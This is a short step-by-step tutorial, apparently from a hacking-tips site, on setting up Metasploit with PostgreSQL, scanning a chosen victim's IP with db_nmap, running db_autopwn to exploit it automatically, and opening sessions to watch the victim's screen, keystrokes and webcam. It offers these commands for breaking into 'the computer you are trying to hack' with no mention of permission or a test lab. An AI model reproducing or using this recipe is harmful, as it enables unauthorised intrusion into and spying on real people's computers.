1.) First you need to download Metasploit. The most up-to-date version is free at metasploit.com.
2.) You need PostgreSQL for your database. Download it here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit won't work!
3.) Now let's get down to business... After installing both tools, open up the PostgreSQL admin GUI (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left-hand box) and click connect. Remember to keep this window open the whole time. You will also need the password you chose, for use in step 5...
4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit GUI. Let it load until it looks like this:
5.) Now, in the window type:
    db_connect postgres:ThePassYouChose@localhost:5432
The first time you do this you will see lots of text flash by. Don't worry, this is normal.
6.) Type db_host to make sure you are connected correctly.
7.) Now type this:
    db_nmap 000.000.000.000
Make sure you put the IP of the computer you are trying to hack in the place of 000.000.000.000...
8.) Now we get to the fun part: the automatic exploitation. Just type
    db_autopwn -t -p -e -s -b
watch the auto-exploitation start, go play Halo for a while, and then come back...
9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i.e., reverse Screen_tcp). In order to use an exploit, type this:
    sessions -i Exploit Number
The features of Metasploit are much like a RAT. Once you get into someone's computer, you can see their screen, control their mouse, see what they type, see them, etc.
Source: tricks